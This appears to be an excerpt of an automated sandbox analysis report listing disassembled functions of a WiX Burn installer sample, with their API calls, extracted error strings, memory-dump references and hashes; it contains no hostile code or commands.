Instruction ID: 744e4b07c998eefe966c8805a4e333b7b782e87993ca8824317e6002019662dd
Opcode Fuzzy Hash: 1407dc781b16129fc896f4ef22a456882df618c010b16517bb697fc34f969098
Instruction Fuzzy Hash: B351F876D0012ABBDF12DFA48C45EAFBFB9FF08710F044156FA14E6190E7359A519BA0

Function 004C9EC7 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 147COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 004C9EED
_MREFOpen@16.MSPDB140-MSVCRT ref: 004C9F12

Strings

MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 004CA006
Failed to format component id string., xrefs: 004C9EF8
Failed to set variable., xrefs: 004C9FF6
Failed to get component path: %d, xrefs: 004C9F76
Failed to format product code string., xrefs: 004C9F1D

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Open@16
String ID: Failed to format component id string.$Failed to format product code string.$Failed to get component path: %d$Failed to set variable.$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
API String ID: 3613110473-1671347822
Opcode ID: e30c84c022764b398ea5f3d39bb9a96f0e755be66ac506d43c1af10f06fdb8ed
Instruction ID: af584c9846f7d374b93865c1ca0c0245275b505f6d40a993ba67f03ba1bebbba
Opcode Fuzzy Hash: e30c84c022764b398ea5f3d39bb9a96f0e755be66ac506d43c1af10f06fdb8ed
Instruction Fuzzy Hash: 1B41C33A900115BACFA59AA88C4EFBFBB68EF04310F24465FF514E22D1D7389E50975A

Function 004CF812 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 004CF942
RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 004CF94F

Strings

Failed to read Resume value., xrefs: 004CF8D8
Failed to format pending restart registry key to read., xrefs: 004CF846
Failed to open registration key., xrefs: 004CF8AB
Resume, xrefs: 004CF8B6
%ls.RebootRequired, xrefs: 004CF82F

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Close
String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
API String ID: 3535843008-3890505273
Opcode ID: 100ed5c5deedea3d947d2314b5f6e62aeed1e748a21cf75abc90517bb23f7fea
Instruction ID: cd86e0edeea8565cf0a7b7ecb65501b7a014c97aac404062e0a023448cfc591b
Opcode Fuzzy Hash: 100ed5c5deedea3d947d2314b5f6e62aeed1e748a21cf75abc90517bb23f7fea
Instruction Fuzzy Hash: 16416DB9900119FBDF519F98C880FADBBB6FB04310F15417BE910AB260C37DAE499B59

Function 004DAA00 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 111COMMON

Download Yara Rule

Strings

Failed to determine length of relative path., xrefs: 004DAA4D
Failed to determine length of source path., xrefs: 004DAA30
Failed to trim source folder., xrefs: 004DAA95
WixBundleLastUsedSource, xrefs: 004DAA9F, 004DAAA5, 004DAAE1
Failed to set last source., xrefs: 004DAAF0

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID:
String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource
API String ID: 0-660234312
Opcode ID: 7d916e4998126a763d02ff9833e55799746e91edc6ffc7eebf3f29c47d517883
Instruction ID: e6297fb06df02a0df09e261ca29568a50d7d5c0c0c9a8e2afc02255ca2f87699
Opcode Fuzzy Hash: 7d916e4998126a763d02ff9833e55799746e91edc6ffc7eebf3f29c47d517883
Instruction Fuzzy Hash: F031F432900129BFCF229A94CC55F9EBBB9EB00720F200357F910B63D0DB759D51C695

Function 004ED8B0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 106comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00520C4C,00000000,00000017,00520C5C,?,?,00000000,00000000,?,?,?,?,?,004EDEE7,00000000,00000000), ref: 004ED8E8

Strings

Failed to set notification flags for BITS job., xrefs: 004ED93A
Failed to set BITS job to foreground., xrefs: 004ED969
WixBurn, xrefs: 004ED913
Failed to create IBackgroundCopyManager., xrefs: 004ED8F4
Failed to set progress timeout., xrefs: 004ED952
Failed to create BITS job., xrefs: 004ED922

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CreateInstance
String ID: Failed to create BITS job.$Failed to create IBackgroundCopyManager.$Failed to set BITS job to foreground.$Failed to set notification flags for BITS job.$Failed to set progress timeout.$WixBurn
API String ID: 542301482-468763447
Opcode ID: f7591f6e8b505a2e78c7761715890d148c564e890ed47f679340639dfc84beb8
Instruction ID: 860e00d22293ff5426e829cd8e6ca247612d5a36e60ddef8f4bdb5af9e020306
Opcode Fuzzy Hash: f7591f6e8b505a2e78c7761715890d148c564e890ed47f679340639dfc84beb8
Instruction Fuzzy Hash: 1931D2B1E4126AAFCB14DBAAD845D6FBBB4AF49711B00015AE901FB391CA349C05CB91

Function 00505DAE Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 00505DF8
GetLastError.KERNEL32 ref: 00505E05
ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 00505E4C
GetLastError.KERNEL32 ref: 00505E80
CloseHandle.KERNEL32(00000000,dlutil.cpp,000000C8,00000000), ref: 00505EB4

Strings

dlutil.cpp, xrefs: 00505E29, 00505EA4
%ls.R, xrefs: 00505DCC

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleRead
String ID: %ls.R$dlutil.cpp
API String ID: 3160720760-657863730
Opcode ID: 40adad1cfe36a4e6f055a0f979e37bdfa031bd4ab203417187e2f66cb8ad5969
Instruction ID: b977bf8181ac477bd645ca93a86819dee2bb682d5777fb492a96d2e0fc332ada
Opcode Fuzzy Hash: 40adad1cfe36a4e6f055a0f979e37bdfa031bd4ab203417187e2f66cb8ad5969
Instruction Fuzzy Hash: BE31FB72941625ABE7208F54CC49B6F7EACFF01721F114299FE55EB2C0E7705E009AE5

Function 004CC8E6 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004CCD5E: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,004CE444,000000FF,00000000,00000000,004CE444,?,?,004CDBEB,?,?,?,?), ref: 004CCD89

CreateFileW.KERNEL32(E90050BA,80000000,00000005,00000000,00000003,08000000,00000000,004C53C5,?,00000000,840F01E8,14680A79,00000001,004C53BD,00000000,004C5489), ref: 004CC956
GetLastError.KERNEL32(?,?,?,004D7809,004C566D,004C5479,004C5479,00000000,?,004C5489,FFF9E89D,004C5489,004C54BD,004C5445,?,004C5445), ref: 004CC99B

Strings

Failed to verify catalog signature: %ls, xrefs: 004CC994
catalog.cpp, xrefs: 004CC9BC
Failed to open catalog in working path: %ls, xrefs: 004CC9C9
Failed to find payload for catalog file., xrefs: 004CC9E0
Failed to get catalog local file path, xrefs: 004CC9D9

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CompareCreateErrorFileLastString
String ID: Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$catalog.cpp
API String ID: 1774366664-48089280
Opcode ID: 80ce199224a70a06e763d2b085d6c65b723b3a27fc12d4f19898822e612cc41d
Instruction ID: 58784d4ade81560b5dd7183bbd1fd4790628cb23293b7bcac682e25e7664d70a
Opcode Fuzzy Hash: 80ce199224a70a06e763d2b085d6c65b723b3a27fc12d4f19898822e612cc41d
Instruction Fuzzy Hash: 0031D5B6900626BBD7219B54CC86F5EBBA4FF04720F21456FF908EB280E675AD1097D4

Function 004ED33E Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 92synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,755730B0,00000000,?,?,?,?,004ED642,?), ref: 004ED357
ReleaseMutex.KERNEL32(?,?,?,?,004ED642,?), ref: 004ED375
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004ED3B6
ReleaseMutex.KERNEL32(?), ref: 004ED3CD
SetEvent.KERNEL32(?), ref: 004ED3D6

Strings

Failed to send files in use message from netfx chainer., xrefs: 004ED41C
Failed to get message from netfx chainer., xrefs: 004ED3F7

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: MutexObjectReleaseSingleWait$Event
String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.
API String ID: 2608678126-3424578679
Opcode ID: 5858472372633a5dfff295cfafdfed140f8eed719efc8db0478df554991826fd
Instruction ID: 742bee23bb452422ff4f3a9880749cfcb69119f7fe59e932efe69c0a430c6232
Opcode Fuzzy Hash: 5858472372633a5dfff295cfafdfed140f8eed719efc8db0478df554991826fd
Instruction Fuzzy Hash: 0231073590065ABFCB119F95DC48EAFBBF4EF54321F108266F925E22A0C734A914DB90

Function 0050093B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 92processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 005009AB
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 005009B5
CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 005009FE
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 00500A0B

Strings

"%ls" %ls, xrefs: 00500974
D, xrefs: 00500993
procutil.cpp, xrefs: 005009D9

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseHandle$CreateErrorLastProcess
String ID: "%ls" %ls$D$procutil.cpp
API String ID: 161867955-2732225242
Opcode ID: 3d567c489aa544ce32a4584aaa4802f89b8fa753123849e07ed494fe5838a512
Instruction ID: 347148072041fa5e4cad3ac511362fa7d0d9b7c90cdfd2750604c928c0e93d08
Opcode Fuzzy Hash: 3d567c489aa544ce32a4584aaa4802f89b8fa753123849e07ed494fe5838a512
Instruction Fuzzy Hash: FD215172D0125EABEB11DFD5CD45AAFBBB8FF04714F10052AEA04B7291E3719E049AA1

Function 004C9B9A Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 75COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 004C9BB3
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,?,004CA8AB,00000100,000002C0,000002C0,00000100), ref: 004C9BD3
GetLastError.KERNEL32(?,004CA8AB,00000100,000002C0,000002C0,00000100), ref: 004C9BDE

Strings

Failed to set directory search path variable., xrefs: 004C9C0F
Failed to format variable string., xrefs: 004C9BBE
Failed while searching directory search: %ls, for path: %ls, xrefs: 004C9C34
Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 004C9C4A

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
API String ID: 1811509786-2966038646
Opcode ID: 260f8b7a624ae8f5f8a8b4d621fc3a57a8b23695695ba88e104f4fd317c6a6ca
Instruction ID: 5e8a7bf3a665b09cc12ee14e631c8d2e1348307371645805a9708e45f346569b
Opcode Fuzzy Hash: 260f8b7a624ae8f5f8a8b4d621fc3a57a8b23695695ba88e104f4fd317c6a6ca
Instruction Fuzzy Hash: 5221F63F940126F7CB6226959D0AF5EBF68BF10360F20024BFD10761A1D7699E50AACD

Function 004C9D4B Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 72COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 004C9D64
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,?,004CA883,00000100,000002C0,000002C0,?,000002C0,00000100), ref: 004C9D84
GetLastError.KERNEL32(?,004CA883,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 004C9D8F

Strings

Failed while searching file search: %ls, for path: %ls, xrefs: 004C9DBD
File search: %ls, did not find path: %ls, xrefs: 004C9DF3
Failed to set variable to file search path., xrefs: 004C9DE7
Failed to format variable string., xrefs: 004C9D6F

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed to format variable string.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls
API String ID: 1811509786-3425311760
Opcode ID: b81ffb708bc050b447dea6a4ce6150eadb0d210efd33372438d32b625945bba9
Instruction ID: 28208e2e97dbf3d9f4b533af08a2fd487d80de6a2affb52351ce8d1436f41acc
Opcode Fuzzy Hash: b81ffb708bc050b447dea6a4ce6150eadb0d210efd33372438d32b625945bba9
Instruction Fuzzy Hash: FF112B3B840126B7DF626694CD0BF9EBB25EF10720F20021BFC11761E1E73A5E10A6D9

Function 004C9A4D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 57COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 004C9AC4

Strings

Failed to get Condition inner text., xrefs: 004C9A94
`5w, xrefs: 004C9AC4
Failed to copy condition string from BSTR, xrefs: 004C9AAE
Condition, xrefs: 004C9A5F
Failed to select condition node., xrefs: 004C9A7B
ETL, xrefs: 004C9A4D

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: FreeString
String ID: Condition$ETL$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.$`5w
API String ID: 3341692771-659014054
Opcode ID: 4d9d67aa9921846e4cf567e813d244ee81e5b21851e186c39dd9bd6a1b05e8fc
Instruction ID: c6ee599f129fec5b4efcd4032af791850ef88d4d6a252ee410474e770081064c
Opcode Fuzzy Hash: 4d9d67aa9921846e4cf567e813d244ee81e5b21851e186c39dd9bd6a1b05e8fc
Instruction Fuzzy Hash: 4911C835901264BBDB559B94CD0EFAEBB78FF00711F10415EFC00BA290C7BA9E40D698

Function 004DCF25 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 55synchronizationthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,004DD365,00000000,?,?,004DC7C9,00000001,?,?,?,?,?), ref: 004DCF37
GetLastError.KERNEL32(?,?,004DD365,00000000,?,?,004DC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 004DCF41
GetExitCodeThread.KERNEL32(00000001,?,?,?,004DD365,00000000,?,?,004DC7C9,00000001,?,?,?,?,?,00000000), ref: 004DCF7D
GetLastError.KERNEL32(?,?,004DD365,00000000,?,?,004DC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 004DCF87

Strings

elevation.cpp, xrefs: 004DCF65, 004DCFAB
Failed to get cache thread exit code., xrefs: 004DCFB5
Failed to wait for cache thread to terminate., xrefs: 004DCF6F

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectSingleThreadWait
String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$elevation.cpp
API String ID: 3686190907-1954264426
Opcode ID: 5cc3ea6c6a212efb6976a4dcb6fa9e5452688ec6ac1ce5cb85f73c10ada2db6c
Instruction ID: 0a7f5ef3c9a25c50532822e37ee6a17503c576912e193b1d50c847969fb49daf
Opcode Fuzzy Hash: 5cc3ea6c6a212efb6976a4dcb6fa9e5452688ec6ac1ce5cb85f73c10ada2db6c
Instruction Fuzzy Hash: C3012B77A8163767E7305B858C8AADF7D55AF04B61B02411BBE04BB3C0E7588D00D1EC

Function 004D69AE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54synchronizationthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,004D6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 004D69BB
GetLastError.KERNEL32(?,004D6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 004D69C5
GetExitCodeThread.KERNEL32(00000001,00000000,?,004D6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 004D6A04
GetLastError.KERNEL32(?,004D6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 004D6A0E

Strings

core.cpp, xrefs: 004D69EC, 004D6A35
Failed to get cache thread exit code., xrefs: 004D6A3F
Failed to wait for cache thread to terminate., xrefs: 004D69F6

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectSingleThreadWait
String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
API String ID: 3686190907-2546940223
Opcode ID: 7c55a775849c88c1cacf40feb466743dda92e5b6a90ec9e76816e30dfe7f9f72
Instruction ID: f59bec6ef21f7459373c443e4255f7772ebdaf4f891c6d006ac77423e4e199af
Opcode Fuzzy Hash: 7c55a775849c88c1cacf40feb466743dda92e5b6a90ec9e76816e30dfe7f9f72
Instruction Fuzzy Hash: 00115270740206BBEB109F619D26B7F7AA8EB04751F11416BB944E9390EB39CF44AA68

Function 004DAB9E Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 140COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(yTL,000000FF,00AAC56B,E90050BA,004C53BD,00000000,?,E90050BA,00000000), ref: 004DAC94
GetLastError.KERNEL32(00000000,00000000,00000000,00000000,yTL,000000FF,00AAC56B,E90050BA,004C53BD,00000000,?,E90050BA,00000000), ref: 004DACD8

Strings

Failed to get provider state from authenticode certificate., xrefs: 004DACC2
Failed to verify expected payload against actual certificate chain., xrefs: 004DAD1E
Failed authenticode verification of payload: %ls, xrefs: 004DAC75
Failed to get signer chain from authenticode certificate., xrefs: 004DAD06
yTL, xrefs: 004DAC88
cache.cpp, xrefs: 004DAC6A, 004DACB8, 004DACFC

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast
String ID: Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$cache.cpp$yTL
API String ID: 1452528299-2030791232
Opcode ID: 47c08ebcdc1c8ed4e5fd4ea7d891204b51570f45fcff910ebdfd23c57890a552
Instruction ID: f1d0836817e60c221a9dc7e04f47369e0917da7d034ed093802df2a484e81b87
Opcode Fuzzy Hash: 47c08ebcdc1c8ed4e5fd4ea7d891204b51570f45fcff910ebdfd23c57890a552
Instruction Fuzzy Hash: CE418876D01229ABDB119B95CC55AEFBBB8EF04724F01012BF900B7381D7785D448AEA

Function 004DF7D9 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 118COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 004DF7EE
LeaveCriticalSection.KERNEL32(?), ref: 004DF8FB

Strings

Engine is active, cannot change engine state., xrefs: 004DF808
UX requested unknown container with id: %ls, xrefs: 004DF8BA
UX requested unknown payload with id: %ls, xrefs: 004DF85A
Failed to set source path for payload., xrefs: 004DF88A
Failed to set source path for container., xrefs: 004DF8E0
UX denied while trying to set source on embedded payload: %ls, xrefs: 004DF870

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Engine is active, cannot change engine state.$Failed to set source path for container.$Failed to set source path for payload.$UX denied while trying to set source on embedded payload: %ls$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
API String ID: 3168844106-4121889706
Opcode ID: 4b24ed82088e56f7b52060aaf98bead1ba178bcb8f68603db7222ed295d5f5b2
Instruction ID: 17504c72bc26eb8f3220fcb01502009340fc6194c38333c40c2e8c48383cc2c3
Opcode Fuzzy Hash: 4b24ed82088e56f7b52060aaf98bead1ba178bcb8f68603db7222ed295d5f5b2
Instruction Fuzzy Hash: 31311436A00251AB9B31AB58CC55E9B77A8AF04720B15402BF806EB340DB7DED44A79A

Function 004C71FD Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 99stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000), ref: 004C7210

Strings

[]{}, xrefs: 004C723A
Failed to format escape sequence., xrefs: 004C72AA
Failed to allocate buffer for escaped string., xrefs: 004C7227
Failed to append characters., xrefs: 004C729C
Failed to append escape sequence., xrefs: 004C72A3
[\%c], xrefs: 004C726F
Failed to copy string., xrefs: 004C72C4

Memory Dump Source

